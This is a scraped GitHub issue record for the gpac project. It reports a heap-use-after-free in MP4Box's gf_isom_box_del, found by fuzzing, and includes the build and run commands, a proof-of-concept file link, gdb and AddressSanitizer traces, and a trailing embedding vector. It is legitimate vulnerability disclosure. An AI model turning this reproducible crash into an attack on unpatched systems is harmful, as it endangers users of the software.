gf_isom_box_del () #5 0x000000000053fa07 in gf_isom_box_del () #6 0x000000000053fa07 in gf_isom_box_del () #7 0x000000000053fa07 in gf_isom_box_del () #8 0x0000000000541407 in gf_isom_box_array_del () #9 0x000000000054ab73 in gf_isom_delete_movie () #10 0x000000000054d89d in gf_isom_close () #11 0x00000000004171c3 in mp4boxMain () #12 0x00007ffff6ec7840 in __libc_start_main (main=0x409dc0 <main>, argc=5, argv=0x7fffffffdf78, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdf68) at ../csu/libc-start.c:291 #13 0x0000000000409df9 in _start () ``` ASAN info: ```C ==17415==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000e7f8 at pc 0x000000736277 bp 0x7fff80125400 sp 0x7fff801253f0 READ of size 8 at 0x60600000e7f8 thread T0 #0 0x736276 in gf_isom_box_del isomedia/box_funcs.c:1696 #1 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #2 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #3 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #4 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #5 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #6 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #7 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #8 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #9 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #10 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #11 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #12 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #13 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #14 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #15 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #16 0x738e3e in gf_isom_box_array_reset isomedia/box_funcs.c:346 #17 0x738e3e in gf_isom_box_array_del isomedia/box_funcs.c:352 #18 0x7545bd in gf_isom_delete_movie isomedia/isom_intern.c:908 #19 0x75bf4e in gf_isom_close isomedia/isom_read.c:618 #20 0x42c0c0 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6718 #21 0x7f6c5505883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #22 0x417638 in _start (/opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/build/bin/MP4Box+0x417638) 0x60600000e7f8 is located 24 bytes inside of 56-byte region [0x60600000e7e0,0x60600000e818) freed by thread T0 here: #0 0x7f6c560002ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7361af in gf_isom_box_del isomedia/box_funcs.c:1703 #2 0x78000e in CleanWriters isomedia/isom_store.c:105 #3 0x78000e in WriteInterleaved isomedia/isom_store.c:1728 #4 0x7811f2 in WriteToFile isomedia/isom_store.c:1885 #5 0x75ba6e in gf_isom_write isomedia/isom_read.c:592 #6 0x75bf43 in gf_isom_close isomedia/isom_read.c:616 #7 0x42c0c0 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6718 #8 0x7f6c5505883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) previously allocated by thread T0 here: #0 0x7f6c56000602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x102065d in co64_box_new isomedia/box_code_base.c:65 #2 0x735fdf in gf_isom_box_new_ex isomedia/box_funcs.c:1582 #3 0x735fdf in gf_isom_box_new isomedia/box_funcs.c:1605 #4 0x7feec4 in stbl_AddOffset isomedia/stbl_write.c:1989 #5 0x7feec4 in stbl_SetChunkAndOffset isomedia/stbl_write.c:2090 #6 0x77f65a in DoInterleave isomedia/isom_store.c:1537 #7 0x780197 in WriteInterleaved isomedia/isom_store.c:1665 #8 0x7811f2 in WriteToFile isomedia/isom_store.c:1885 #9 0x75ba6e in gf_isom_write isomedia/isom_read.c:592 #10 0x75bf43 in gf_isom_close isomedia/isom_read.c:616 #11 0x42c0c0 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6718 #12 0x7f6c5505883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) SUMMARY: AddressSanitizer: heap-use-after-free isomedia/box_funcs.c:1696 gf_isom_box_del Shadow bytes around the buggy address: 0x0c0c7fff9ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c0c7fff9cf0: fa fa fa fa fa fa fa fa fa fa fa fa fd fd fd[fd] 0x0c0c7fff9d00: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa 0x0c0c7fff9d10: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff9d20: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd 0x0c0c7fff9d30: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9d40: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==17415==ABORTING ``` Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Xiangkun Jia(xiangkun@iscas.ac.cn) 、Marsman1996(lqliuyuwei@outlook.com) and Yanhao.
AddressSanitizer: heap-use-after-free in gf_isom_box_del isomedia/box_funcs.c:1696
https://api.github.com/repos/gpac/gpac/issues/1661/comments
0
2020-12-15T12:01:23
2021-01-04T11:04:52Z
https://github.com/gpac/gpac/issues/1661
767,520,741
1,661
true
This is a GitHub Issue repo:gpac owner:gpac Title : AddressSanitizer: heap-use-after-free in gf_isom_box_del isomedia/box_funcs.c:1696 Issue date: --- start body --- System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master c4f8bc6e and the latest V1.0.1 d8538e8) I think it is probably due to an imcomplete fix of [#1340](https://github.com/gpac/gpac/issues/1340) 、[#1440](https://github.com/gpac/gpac/issues/1440) and [#1332](https://github.com/gpac/gpac/issues/1332). Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box --extra-ldflags="-ldl -g" $ make ``` Run Command: ``` $ MP4Box -hint $gf_isom_box_del-UAF -out /dev/null ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-c4f8bc6e_poc/gf_isom_box_del-UAF gdb info: ```C Program received signal SIGSEGV, Segmentation fault. __GI___libc_free (mem=0x7ffff6867010) at malloc.c:2958 2958 malloc.c: No such file or directory. (gdb) bt #0 __GI___libc_free (mem=0x7ffff6867010) at malloc.c:2958 #1 0x00000000008d8557 in co64_box_del () #2 0x000000000053f9d4 in gf_isom_box_del () #3 0x000000000053fa07 in gf_isom_box_del () #4 0x000000000053fa07 in gf_isom_box_del () #5 0x000000000053fa07 in gf_isom_box_del () #6 0x000000000053fa07 in gf_isom_box_del () #7 0x000000000053fa07 in gf_isom_box_del () #8 0x0000000000541407 in gf_isom_box_array_del () #9 0x000000000054ab73 in gf_isom_delete_movie () #10 0x000000000054d89d in gf_isom_close () #11 0x00000000004171c3 in mp4boxMain () #12 0x00007ffff6ec7840 in __libc_start_main (main=0x409dc0 <main>, argc=5, argv=0x7fffffffdf78, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdf68) at ../csu/libc-start.c:291 #13 0x0000000000409df9 in _start () ``` ASAN info: ```C ==17415==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000e7f8 at pc 0x000000736277 bp 0x7fff80125400 sp 0x7fff801253f0 READ of size 8 at 0x60600000e7f8 thread T0 #0 0x736276 in gf_isom_box_del isomedia/box_funcs.c:1696 #1 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #2 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #3 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #4 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #5 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #6 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #7 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #8 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #9 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #10 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #11 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #12 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #13 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #14 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #15 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #16 0x738e3e in gf_isom_box_array_reset isomedia/box_funcs.c:346 #17 0x738e3e in gf_isom_box_array_del isomedia/box_funcs.c:352 #18 0x7545bd in gf_isom_delete_movie isomedia/isom_intern.c:908 #19 0x75bf4e in gf_isom_close isomedia/isom_read.c:618 #20 0x42c0c0 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6718 #21 0x7f6c5505883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #22 0x417638 in _start (/opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/build/bin/MP4Box+0x417638) 0x60600000e7f8 is located 24 bytes inside of 56-byte region [0x60600000e7e0,0x60600000e818) freed by thread T0 here: #0 0x7f6c560002ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7361af in gf_isom_box_del isomedia/box_funcs.c:1703 #2 0x78000e in CleanWriters isomedia/isom_store.c:105 #3 0x78000e in WriteInterleaved isomedia/isom_store.c:1728 #4 0x7811f2 in WriteToFile isomedia/isom_store.c:1885 #5 0x75ba6e in gf_isom_write isomedia/isom_read.c:592 #6 0x75bf43 in gf_isom_close isomedia/isom_read.c:616 #7 0x42c0c0 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6718 #8 0x7f6c5505883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) previously allocated by thread T0 here: #0 0x7f6c56000602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x102065d in co64_box_new isomedia/box_code_base.c:65 #2 0x735fdf in gf_isom_box_new_ex isomedia/box_funcs.c:1582 #3 0x735fdf in gf_isom_box_new isomedia/box_funcs.c:1605 #4 0x7feec4 in stbl_AddOffset isomedia/stbl_write.c:1989 #5 0x7feec4 in stbl_SetChunkAndOffset isomedia/stbl_write.c:2090 #6 0x77f65a in DoInterleave isomedia/isom_store.c:1537 #7 0x780197 in WriteInterleaved isomedia/isom_store.c:1665 #8 0x7811f2 in WriteToFile isomedia/isom_store.c:1885 #9 0x75ba6e in gf_isom_write isomedia/isom_read.c:592 #10 0x75bf43 in gf_isom_close isomedia/isom_read.c:616 #11 0x42c0c0 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6718 #12 0x7f6c5505883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) SUMMARY: AddressSanitizer: heap-use-after-free isomedia/box_funcs.c:1696 gf_isom_box_del Shadow bytes around the buggy address: 0x0c0c7fff9ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c0c7fff9cf0: fa fa fa fa fa fa fa fa fa fa fa fa fd fd fd[fd] 0x0c0c7fff9d00: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa 0x0c0c7fff9d10: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff9d20: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd 0x0c0c7fff9d30: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9d40: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==17415==ABORTING ``` Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Xiangkun Jia(xiangkun@iscas.ac.cn) 、Marsman1996(lqliuyuwei@outlook.com) and Yanhao. --- end body ---
7,214
[ -0.03175754100084305, 0.03333647921681404, -0.01149199903011322, -0.0019085060339421034, 0.01715979538857937, 0.0017223103204742074, -0.03417063504457474, 0.02691645175218582, -0.011134503409266472, 0.0006554088904522359, -0.03142983466386795, 0.008043654263019562, 0.01710021309554577, -0.00836391095072031, 0.011276012286543846, 0.005049627739936113, -0.0207049623131752, 0.042869698256254196, -0.0076265763491392136, -0.015208465047180653, 0.02533751167356968, -0.032919399440288544, -0.009145933203399181, 0.030744634568691254, 0.0026607366744428873, 0.010471646673977375, -0.003688537050038576, 0.011722881346940994, -0.002954925876110792, 0.027795294299721718, -0.011387729085981846, 0.020526215434074402, 0.013204999268054962, 0.030327556654810905, 0.03625602647662163, -0.0029307203367352486, 0.047249022871255875, 0.0838327556848526, 0.007790428586304188, 0.018068430945277214, 0.02100287564098835, -0.06029761582612991, -0.03986077755689621, 0.022269006818532944, -0.004036722704768181, 0.017249170690774918, 0.00631203455850482, 0.003548890119418502, -0.023773467168211937, 0.013041147030889988, 0.03732851520180702, -0.005950814578682184, -0.006513125728815794, -0.053237076848745346, 0.022015780210494995, -0.03717955946922302, 0.04564028978347778, 0.030893592163920403, -0.0006251520826481283, 0.016385221853852272, -0.008073445409536362, -0.004208023194223642, -0.002481988864019513, 0.015804290771484375, -0.007235565222799778, 0.01678740419447422, 0.015357421711087227, 0.00574599951505661, -0.019766535609960556, 0.011976107954978943, -0.009391711093485355, -0.026350416243076324, -0.005071971099823713, 0.02974662557244301, 0.014195560477674007, -0.02712498977780342, 0.024488458409905434, 0.017710935324430466, -0.021673180162906647, 0.026052502915263176, -0.051151685416698456, 0.0422440804541111, -0.017606666311621666, 0.022313693538308144, 0.004774057772010565, 0.016415013000369072, -0.049155667424201965, -0.082343190908432, -0.018068430945277214, -0.03747747093439102, 0.0061928690411150455, 0.014195560477674007, 0.005876336712390184, -0.004606481641530991, 0.012445321306586266, 0.008438389748334885, -0.051092103123664856, 0.002420544158667326, -0.04024806246161461, -0.000415914662880823, -0.038460586220026016, -0.04435926675796509, 0.004055342637002468, 0.002124493010342121, -0.006256175693124533, 0.005068247206509113, 0.004200574941933155, -0.030282869935035706, 0.0020202232990413904, 0.13072428107261658, 0.02279035374522209, -0.005183688364923, 0.0023758572060614824, 0.038430795073509216, 0.007499963045120239, 0.030104121193289757, -0.013286925852298737, -0.010538676753640175, -0.03619644418358803, -0.03134046122431755, 0.016042621806263924, -0.026469580829143524, -0.0051315538585186005, 0.023862842470407486, -0.030059434473514557, 0.053296659141778946, 0.022596711292862892, 0.0010603845585137606, -0.007537201978266239, -0.021509328857064247, -0.04638507589697838, -0.020004866644740105, 0.011961212381720543, -0.02495022490620613, -0.004826192744076252, -0.02104756236076355, -0.008944842033088207, 0.034647297114133835, 0.011976107954978943, 0.02690155617892742, -0.06994999945163727, -0.03723914176225662, 0.025888651609420776, -0.009205515496432781, -0.02308826707303524, -0.0038207359611988068, -0.002854380290955305, 0.023847946897149086, -0.034855835139751434, -0.009823685511946678, -0.004353255499154329, -0.0420653335750103, 0.019915493205189705, -0.0008672064868733287, 0.06905626505613327, 0.014307278208434582, 0.016131995245814323, 0.04581904038786888, 0.005306577775627375, -0.0023851669393479824, -0.0005720863118767738, -0.03783496841788292, 0.011715433560311794, -0.0206006933003664, -0.038549959659576416, -0.017576875165104866, 0.03163837268948555, 0.02287972904741764, 0.007276528049260378, 0.025799276307225227, -0.0005846545100212097, 0.01149199903011322, 0.021956197917461395, 0.04814276099205017, -0.0625617578625679, -0.013197551481425762, 0.026454685255885124, 0.015327630564570427, -0.011961212381720543, -0.015908561646938324, 0.009927955456078053, 0.026469580829143524, 0.009227858856320381, 0.022283902391791344, 0.01884300634264946, -0.022492440417408943, 0.005034731701016426, -0.04823213443160057, 0.019692057743668556, -0.024265024811029434, -0.005381056107580662, -0.012579381465911865, 0.011804807931184769, 0.00007826038199709728, 0.06917542964220047, -0.014925448223948479, -0.011067472398281097, -0.001764204353094101, -0.015848979353904724, -0.009160828776657581, 0.01377848256379366, -0.008713958784937859, -0.0015277357306331396, 0.005533736199140549, -0.024548042565584183, -0.01380082592368126, -0.011767568998038769, 0.027780398726463318, 0.012341051362454891, -0.006997234653681517, -0.015476587228477001, -0.028569869697093964, 0.008475628681480885, -0.0007796945283189416, -0.0015686987899243832, 0.0026030158624053, -0.028122998774051666, 0.001394605846144259, 0.0026774941943585873, -0.009898163378238678, 0.017696039751172066, -0.007518582511693239, -0.00689668906852603, -0.011127055622637272, -0.013651869259774685, -0.01058336440473795, 0.009064006619155407, 0.007306319661438465, -0.027780398726463318, -0.0014951515477150679, 0.012437873519957066, 0.014456234872341156, 0.003323593409731984, 0.0206006933003664, 0.012527246959507465, 0.0021468366030603647, -0.009592803195118904, 0.005567251704633236, -0.011067472398281097, -0.007492515258491039, -0.02094329334795475, 0.040903471410274506, -0.019557997584342957, -0.017755622044205666, 0.01260172575712204, 0.08651397377252579, -0.027944251894950867, -0.02503959834575653, -0.026022711768746376, 0.03193628787994385, 0.023773467168211937, -0.03306835889816284, -0.011760121211409569, 0.004796401597559452, 0.017636457458138466, -0.0051725166849792, 0.021717866882681847, 0.0004252244543749839, -0.024071380496025085, -0.024339502677321434, -0.00025345891481265426, -0.000555328675545752, -0.021434849128127098, 0.004148440435528755, -0.010896172374486923, -0.008505419827997684, 0.0031969803385436535, 0.0206304844468832, -0.008900154381990433, -0.008676719851791859, 0.02943381667137146, -0.007496239151805639, -0.024533146992325783, -0.028346434235572815, -0.028152789920568466, 0.007686158642172813, -0.0206602755934, 0.0207794401794672, 0.021956197917461395, -0.00010589880548650399, -0.009831133298575878, 0.008475628681480885, -0.0024466116447001696, 0.027988938614726067, 0.006676977965980768, -0.0018312347820028663, -0.0017102075507864356, 0.00832667201757431, -0.008795885369181633, 0.012929430231451988, 0.006617395207285881, -0.00038472688174806535, -0.04823213443160057, 0.030506305396556854, 0.028152789920568466, 0.01650438830256462, -0.02097308449447155, -0.0023069647140800953, -0.020258093252778053, 0.00034655677154660225, -0.007596784736961126, -0.000924461695831269, -0.02697603404521942, -0.01059825997799635, -0.0418865866959095, 0.003988312091678381, -0.034855835139751434, 0.025650320574641228, -0.007518582511693239, 0.0103822723031044, 0.023639407008886337, -0.05052606761455536, -0.03914578631520271, -0.0008080893894657493, -0.020302779972553253, -0.014545608311891556, -0.008028758689761162, -0.01850040629506111, -0.023937320336699486, 0.009607698768377304, -0.02728884294629097, -0.0024689550045877695, -0.02092839777469635, 0.009652385488152504, 0.01669803075492382, 0.0013080248609185219, -0.014880760572850704, 0.015938352793455124, -0.06971167027950287, 0.025873756036162376, 0.012177199125289917, -0.005947090685367584, 0.016325639560818672, -0.036464568227529526, -0.014947791583836079, -0.015148882754147053, -0.026707911863923073, 0.027869774028658867, 0.014448787085711956, -0.01062060333788395, 0.0043793232180178165, 0.011879285797476768, 0.02487574703991413, -0.005634282249957323, -0.03750726208090782, -0.012296364642679691, 0.009726863354444504, -0.009265098720788956, -0.002104011597111821, 0.005630558356642723, 0.0009961470495909452, 0.020496422424912453, 0.015119091607630253, 0.04587862268090248, 0.004316016566008329, -0.007593060843646526, -0.005209756083786488, -0.024130962789058685, 0.022030675783753395, -0.005604490637779236, 0.0011050715111196041, -0.01876852661371231, -0.008959737606346607, 0.011819703504443169, -0.0014448786387220025, 0.021643389016389847, -0.009674728848040104, -0.015983039513230324, -0.01271344255656004, -0.0060923234559595585, -0.03986077755689621, 0.05442873015999794, -0.01867915317416191, 0.021971093490719795, 0.003232357557862997, -0.03119150549173355, 0.024786371737718582, 0.026827076449990273, -0.03813287988305092, 0.00943639874458313, -0.02344576269388199, -0.0009156173910014331, 0.02976152114570141, -0.038579750806093216, 0.013845512643456459, 0.026588747277855873, -0.034706879407167435, 0.047368187457323074, -0.009890715591609478, -0.026529164984822273, -0.06566005200147629, 0.049602534621953964, -0.032442741096019745, -0.04787464067339897, -0.016161786392331123, 0.007745741400867701, -0.019557997584342957, -0.008699063211679459, 0.0029809933621436357, -0.06119135767221451, 0.04692131653428078, -0.012184646911919117, -0.02536730282008648, 0.036494359374046326, -0.020541111007332802, 0.051390014588832855, 0.01660865731537342, -0.009138485416769981, 0.04483592510223389, 0.0038356315344572067, 0.036643315106630325, 0.0013704004231840372, -0.014329621568322182, -0.002050014678388834, 0.057646188884973526, 0.02101777121424675, -0.009384263306856155, 0.006546641234308481, -0.04406135156750679, 0.0414397157728672, -0.02702072076499462, -0.015983039513230324, 0.006412580143660307, 0.008996976539492607, 0.03184691444039345, 0.02937423437833786, -0.011797360144555569, -0.0077531891874969006, 0.0030238183680921793, -0.02518855594098568, -0.01066529005765915, 0.0038728707004338503, -0.0033757281489670277, -0.0059657106176018715, 0.004949081689119339, -0.03747747093439102, -0.036375194787979126, -0.04394218698143959, 0.006170525681227446, -0.015878770500421524, -0.006650910712778568, 0.02104756236076355, -0.0051538972184062, 0.009868372231721878, 0.02716967836022377, -0.04826192557811737, -0.011305803433060646, -0.010121598839759827, 0.014255143702030182, -0.006058808416128159, -0.03140004351735115, 0.011231324635446072, 0.004707027226686478, -0.009138485416769981, 0.008013863116502762, -0.00572738004848361, -0.0034651020541787148, -0.004852259997278452, 0.028212374076247215, 0.012326155789196491, 0.0029176867101341486, 0.03792434185743332, 0.004725647158920765, -0.010196076706051826, 0.028659243136644363, 0.032800234854221344, -0.00833411980420351, -0.012504903599619865, 0.0035675098188221455, -0.02926996536552906, 0.013674212619662285, 0.019557997584342957, -0.00044477498158812523, -0.0031429834198206663, 0.0038207359611988068, 0.02706540748476982, 0.030536096543073654, -0.030476512387394905, -0.01912602223455906, -0.055531006306409836, -0.012370842508971691, 0.006222660653293133, 0.003980864305049181, 0.01860467530786991, 0.0029791314154863358, -0.019692057743668556, -0.025635425001382828, 0.00836391095072031, 0.00046758397365920246, -0.011626060120761395, 0.036613523960113525, 0.002872999757528305, -0.01894727535545826, -0.006218936759978533, 0.017591770738363266, -0.0051613450050354, -0.028301747515797615, -0.0029865792021155357, 0.023982007056474686, 0.005008664447814226, 0.004889499396085739, -0.051598552614450455, -0.0008741888450458646, -0.010486542247235775, 0.034796252846717834, -0.05186667665839195, -0.017338544130325317, 0.03134046122431755, -0.009399158880114555, -0.024756580591201782, -0.03342585265636444, -0.010121598839759827, 0.017532188445329666, -0.034438759088516235, -0.006386512890458107, -0.04352510720491409, 0.016057517379522324, -0.0005017974181100726, 0.018098222091794014, 0.02943381667137146, -0.016072412952780724, -0.010158837772905827, -0.007108951918780804, 0.03717955946922302, 0.04030764475464821, 0.004021827131509781, 0.004278777167201042, 0.009287442080676556, 0.036673106253147125, -0.006423751823604107, -0.0025713627692312002, -0.007686158642172813, -0.022730771452188492, 0.020541111007332802, 0.002958649769425392, 0.0016208336455747485, -0.0010464198421686888, 0.032859817147254944, -0.00840859767049551, -0.017696039751172066, -0.0417972132563591, 0.031102130189538002, -0.02089860662817955, 0.006766351871192455, -0.02545667625963688, 0.029865792021155357, -0.004215470980852842, 0.02520345151424408, -0.02538219839334488, 0.005950814578682184, 0.006699321325868368, -0.001011973712593317, -0.014366860501468182, 0.02286483347415924, -0.002338618040084839, 0.005306577775627375, -0.01272089034318924, 0.01650438830256462, -0.010523781180381775, 0.017457708716392517, 0.0027668680995702744, -0.020377257838845253, 0.000924461695831269, -0.02910611219704151, -0.003709018463268876, -0.002427991945296526, -0.015171226114034653, 0.0212561022490263, -0.04418051615357399, -0.016012830659747124, 0.005522564519196749, 0.0019904321525245905, 0.04802359640598297, -0.027810189872980118, -0.008162819780409336, -0.003314283676445484, 0.003947348799556494, -0.024235233664512634, -0.008676719851791859, -0.0420951247215271, 0.01881321333348751, -0.05469685047864914, -0.032353367656469345, 0.012221885845065117, 0.017740726470947266, -0.026007816195487976, -0.006051360629498959, 0.017532188445329666, 0.0023013788741081953, -0.0012754405615851283, 0.01379337813705206, 0.01662355288863182, -0.027676129713654518, -0.02308826707303524, 0.019185606390237808, -0.0033664184156805277, 0.0044240099377930164, -0.01149199903011322, 0.008751198649406433, -0.005600766744464636, -0.03128087893128395, 0.055769339203834534, -0.008140476420521736, -0.042988862842321396, -0.019915493205189705, -0.0007675918168388307, 0.011223876848816872, -0.012899638153612614, -0.026678120717406273, 0.03828183561563492, 0.0206900667399168, 0.022224320098757744, 0.040754515677690506, -0.01677250862121582, 0.005813030060380697, -0.011722881346940994, 0.03798392415046692, 0.023520242422819138, 0.005094314459711313, 0.030536096543073654, 0.028197478502988815, -0.03622623533010483, 0.016280952841043472, -0.024622520431876183, 0.008043654263019562, 0.0075483741238713264, -0.008036206476390362, -0.030104121193289757, -0.01147710345685482, -0.005407123360782862, -0.020392153412103653, 0.03303856775164604, 0.0013312993105500937, -0.030655261129140854, -0.03423021733760834, 0.019766535609960556, 0.034438759088516235, 0.0004841088375542313, -0.010858933441340923, -0.003947348799556494, 0.007164810784161091, 0.006490782368928194, -0.012452769093215466, -0.00827453751116991, -0.016042621806263924, 0.00687434570863843, 0.012460216879844666, -0.01698104850947857, -0.007075436878949404, 0.031012756749987602, -0.041082222014665604, -0.00955556333065033, 0.0038840423803776503, 0.012244229204952717, 0.02527792938053608, 0.004211747087538242, 0.04343573376536369, 0.0422142893075943, 0.008051102049648762, -0.020094240084290504, -0.0033682803623378277, -0.04471676051616669, -0.025948233902454376, -0.007820219732820988, -0.008438389748334885, -0.01062805112451315, -0.040754515677690506, -0.0017353439470753074, 0.010196076706051826, 0.004986321087926626, -0.017621561884880066, -0.004613929428160191, 0.010732320137321949, -0.0023851669393479824, 0.015938352793455124, -0.03726893290877342, -0.011812255717813969, 0.010963203385472298, -0.026171669363975525, -0.011849494650959969, 0.004059066530317068, -0.009711967781186104, -0.0000591171374253463, 0.004055342637002468, -0.0211667288094759, 0.012959221377968788, 0.007917041890323162, -0.004822468850761652, -0.01911112666130066, -0.022283902391791344, 0.02511407621204853, 0.005582147277891636, 0.019602684304118156, 0.019409039989113808, -0.005693864542990923, -0.025814171880483627, 0.0033608325757086277, -0.002966097556054592, 0.0044053904712200165, -0.022209424525499344, -0.027869774028658867, 0.019721848890185356, -0.009116142056882381, -0.025888651609420776, 0.02493532933294773, 0.017785413190722466, -0.007302595768123865, -0.0007983141113072634, 0.0212709978222847, -0.025858860462903976, -0.01145476009696722, 0.02106245793402195, -0.03583895042538643, 0.01854509301483631, 0.007313767448067665, -0.017770517617464066, 0.0011683780467137694, -0.0045357272028923035, -0.002889757277444005, 0.017636457458138466, -0.020556006580591202, -0.007045645732432604, -0.02706540748476982, -0.03336627036333084, -0.0070307496935129166, -0.017189588397741318, -0.01271344255656004, 0.012110169045627117, -0.005831649526953697, 0.013234790414571762, -0.02346065826714039, -0.040724724531173706, 0.0027426627930253744, 0.005649177823215723, -0.0036773651372641325, -0.008133028633892536, 0.0026030158624053, -0.008788437582552433, 0.0008620861335657537, 0.031012756749987602, -0.004211747087538242, 0.011648403480648994, 0.004844812210649252, -0.01467222161591053, 0.0013322302838787436, -0.010054567828774452, 0.0036457120440900326, -0.002692390000447631, -0.04415072500705719, 0.02338618040084839, 0.007291424088180065, 0.022164737805724144, 0.021792344748973846, -0.024696998298168182, -0.0007140605594031513, -0.01465732604265213, 0.03420042619109154, -0.002396338852122426, -0.01155158132314682, -0.008095789700746536, -0.00035982319968752563, 0.004699579440057278, -0.004088857676833868, 0.01062805112451315, -0.028346434235572815, -0.015446796081960201, 0.008468180894851685, -0.02301378920674324, 0.02693134732544422, 0.0022660016547888517, 0.020124031230807304, -0.0206751711666584, -0.026052502915263176, 0.016474595293402672, 0.0075520980171859264, 